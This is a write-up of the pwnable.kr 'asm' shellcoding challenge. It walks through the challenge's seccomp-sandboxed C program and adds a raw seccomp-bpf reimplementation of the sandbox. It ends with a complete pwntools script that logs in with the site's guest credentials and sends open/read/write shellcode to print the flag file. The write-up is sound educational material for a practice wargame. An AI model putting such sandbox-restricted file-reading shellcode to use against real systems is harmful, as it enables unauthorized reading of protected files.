pwnable.kr asm
This looks like a shellcode challenge.
Let's connect and take a look.
There seems to be a readme file in the home directory, so let's view it.
Roughly, it says: connect to port 9026, where asm runs with elevated privileges, and get the flag.
So let's look at asm.c first.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>
#define LENGTH 128

void sandbox(){
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
    if (ctx == NULL) {
        printf("seccomp error\n");
        exit(0);
    }
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);
    if (seccomp_load(ctx) < 0){
        seccomp_release(ctx);
        printf("seccomp error\n");
        exit(0);
    }
    seccomp_release(ctx);
}

char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];

int main(int argc, char* argv[]){
    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stdin, 0, _IOLBF, 0);
    printf("Welcome to shellcoding practice challenge.\n");
    printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
    printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
    printf("If this does not challenge you. you should play 'asg' challenge :)\n");
    char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
    memset(sh, 0x90, 0x1000);
    memcpy(sh, stub, strlen(stub));
    int offset = sizeof(stub);
    printf("give me your x64 shellcode: ");
    read(0, sh+offset, 1000);
    alarm(10);
    chroot("/home/asm_pwn");    // you are in chroot jail. so you can't use symlink in /tmp
    sandbox();
    ((void (*)(void))sh)();
    return 0;
}
Let's walk through the whole program.
1. Print the hints, map an executable buffer at 0x41414000 filled with NOPs (0x90), and copy the stub into it. The hints say:
In this challenge, you can run x64 shellcode under a SECCOMP sandbox.
Try to make shellcode that prints the flag using only the open()/read()/write() system calls.
    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stdin, 0, _IOLBF, 0);
    printf("Welcome to shellcoding practice challenge.\n");
    printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
    printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
    printf("If this does not challenge you. you should play 'asg' challenge :)\n");
    char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
    memset(sh, 0x90, 0x1000);
    memcpy(sh, stub, strlen(stub));
2. Read our input into the buffer right after the stub, chroot into /home/asm_pwn, enable the seccomp sandbox, and jump to the buffer to execute the shellcode:
    int offset = sizeof(stub);
    printf("give me your x64 shellcode: ");
    read(0, sh+offset, 1000);
    alarm(10);
    chroot("/home/asm_pwn");    // you are in chroot jail. so you can't use symlink in /tmp
    sandbox();
    ((void (*)(void))sh)();
    return 0;
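To see what sandbox() actually enforces, here is an added example (not the challenge's code) that builds the same five-syscall allowlist as a raw seccomp-bpf program, with an architecture check hard-wired to x86_64 like the challenge binary, and replays it against syscall numbers with a small evaluator before installing it. The evaluator and the function names (verdict_for, verdict_for_arch, install_asm_filter) are this example's own; it is Linux-only and uses only headers from the kernel UAPI.

```c
/* Added example: raw seccomp-bpf equivalent of the challenge's sandbox(),
 * plus an offline evaluator to check the policy before it is installed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

/* One "allow if nr == X" rule: skip the RET when the number differs. */
#define ALLOW_SYSCALL(nr)                               \
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (nr), 0, 1),    \
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW)

/* Default action is KILL (SCMP_ACT_KILL in libseccomp terms). */
static struct sock_filter asm_filter[] = {
    /* Refuse other ABIs: an i386 syscall number means something else. */
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    /* Load the syscall number and walk the allowlist. */
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
#ifdef __NR_open                /* legacy open() has no number on some arches */
    ALLOW_SYSCALL(__NR_open),
#endif
    ALLOW_SYSCALL(__NR_read),
    ALLOW_SYSCALL(__NR_write),
    ALLOW_SYSCALL(__NR_exit),
    ALLOW_SYSCALL(__NR_exit_group),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
};
#define ASM_FILTER_LEN (sizeof(asm_filter) / sizeof(asm_filter[0]))

/* Minimal cBPF interpreter for the three instruction kinds used above
 * (absolute word load, JEQ immediate, RET). Fails closed on anything else. */
static uint32_t filter_verdict(const struct sock_filter *prog, size_t len,
                               const struct seccomp_data *data)
{
    uint32_t acc = 0;
    size_t pc = 0;
    while (pc < len) {
        const struct sock_filter *in = &prog[pc];
        switch (BPF_CLASS(in->code)) {
        case BPF_LD:   /* A = *(u32 *)((char *)data + k) */
            memcpy(&acc, (const unsigned char *)data + in->k, sizeof acc);
            pc++;
            break;
        case BPF_JMP:  /* pc += 1 + (A == k ? jt : jf) */
            pc += 1 + (acc == in->k ? in->jt : in->jf);
            break;
        case BPF_RET:
            return in->k;
        default:
            return SECCOMP_RET_KILL;
        }
    }
    return SECCOMP_RET_KILL;
}

/* Verdict for syscall `nr` issued through ABI `arch`, without touching the kernel. */
uint32_t verdict_for_arch(int nr, uint32_t arch)
{
    struct seccomp_data d;
    memset(&d, 0, sizeof d);
    d.nr = nr;
    d.arch = arch;
    return filter_verdict(asm_filter, ASM_FILTER_LEN, &d);
}

/* Verdict for a native x86_64 syscall. */
uint32_t verdict_for(int nr)
{
    return verdict_for_arch(nr, AUDIT_ARCH_X86_64);
}

/* Install the filter on the calling thread; from then on any syscall outside
 * the allowlist kills the thread, exactly as in the challenge. */
int install_asm_filter(void)
{
    struct sock_fprog prog = { .len = (unsigned short)ASM_FILTER_LEN, .filter = asm_filter };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)   /* required for unprivileged callers */
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}

int main(void)
{
    static const char msg[] = "sandboxed: write() still works\n";
    printf("read:             %s\n", verdict_for(__NR_read) == SECCOMP_RET_ALLOW ? "allow" : "kill");
    printf("execve:           %s\n", verdict_for(__NR_execve) == SECCOMP_RET_ALLOW ? "allow" : "kill");
    printf("read via i386 ABI: %s\n",
           verdict_for_arch(__NR_read, AUDIT_ARCH_I386) == SECCOMP_RET_ALLOW ? "allow" : "kill");
    fflush(stdout);                 /* flush before the sandbox: only write()/exit_group() remain */
    if (install_asm_filter() != 0) {
        perror("seccomp");
        return 1;
    }
    write(1, msg, sizeof msg - 1);
    _exit(0);                       /* exit_group(); a return through libc would need more syscalls */
}
```

Two things the evaluator makes visible that the libseccomp version hides: the architecture check (libseccomp adds one for you, and without it an i386-ABI syscall with the same number would slip through with a different meaning), and the fact that openat is not on the list, so a libc open() wrapper on a current glibc would be killed while a raw open syscall passes. This is why the shellcode below issues bare syscalls instead of calling into any library.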
Let's see what the shellcode in stub does, using pwntools to disassemble it:
Python 2.7.17 (default, Oct 19 2019, 23:36:22)
[GCC 9.2.1 20191008] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> print disasm("\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff")
   0:   48        dec eax
   1:   31 c0     xor eax, eax
   3:   48        dec eax
   4:   31 db     xor ebx, ebx
   6:   48        dec eax
   7:   31 c9     xor ecx, ecx
   9:   48        dec eax
   a:   31 d2     xor edx, edx
   c:   48        dec eax
   d:   31 f6     xor esi, esi
   f:   48        dec eax
  10:   31 ff     xor edi, edi
  12:   48        dec eax
  13:   31 ed     xor ebp, ebp
  15:   4d        dec ebp
  16:   31 c0     xor eax, eax
  18:   4d        dec ebp
  19:   31 c9     xor ecx, ecx
  1b:   4d        dec ebp
  1c:   31 d2     xor edx, edx
  1e:   4d        dec ebp
  1f:   31 db     xor ebx, ebx
  21:   4d        dec ebp
  22:   31 e4     xor esp, esp
  24:   4d        dec ebp
  25:   31 ed     xor ebp, ebp
  27:   4d        dec ebp
  28:   31 f6     xor esi, esi
  2a:   4d        dec ebp
  2b:   31 ff     xor edi, edi
Analysing this shellcode: it does nothing except zero the registers. (Note that the REPL session above had no context set, so pwntools decoded the bytes as 32-bit i386, which is why 0x48 and 0x4d show up as dec eax / dec ebp. In 64-bit mode those bytes are REX prefixes, and the sequence is xor rax,rax, xor rbx,rbx, ... xor rbp,rbp followed by xor r8,r8 through xor r15,r15; the conclusion is the same: every general-purpose register is cleared before our code runs.)
Since we now know that only read, open, write, exit and exit_group are allowed, and these are in fact enough to read the flag file, we have everything we need.
So we write the shellcode with pwntools:
from pwn import *
context(arch='amd64',os='linux',log_level='info')
con = ssh(host='pwnable.kr',user='asm',password='guest',port=2222)
r = con.connect_remote('localhost',9026)
shellcode = ''
# push the flag file name onto the stack
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
# the string is now on the stack, i.e. at rsp
shellcode += shellcraft.open('rsp')
# read the file contents to rsp; rax holds the fd returned by open
shellcode += shellcraft.read('rax','rsp',100)
# on Linux 0 -> stdin, 1 -> stdout, 2 -> stderr; write(1,'rsp',100) prints the buffer contents
shellcode += shellcraft.write(1,'rsp',100)
# wait for the prompt, then send the assembled shellcode
# http://docs.pwntools.com/en/stable/tubes.html
r.recvuntil('give me your x64 shellcode: ')
r.sendline(asm(shellcode))
# print the returned data
print r.recvall()
We get the flag.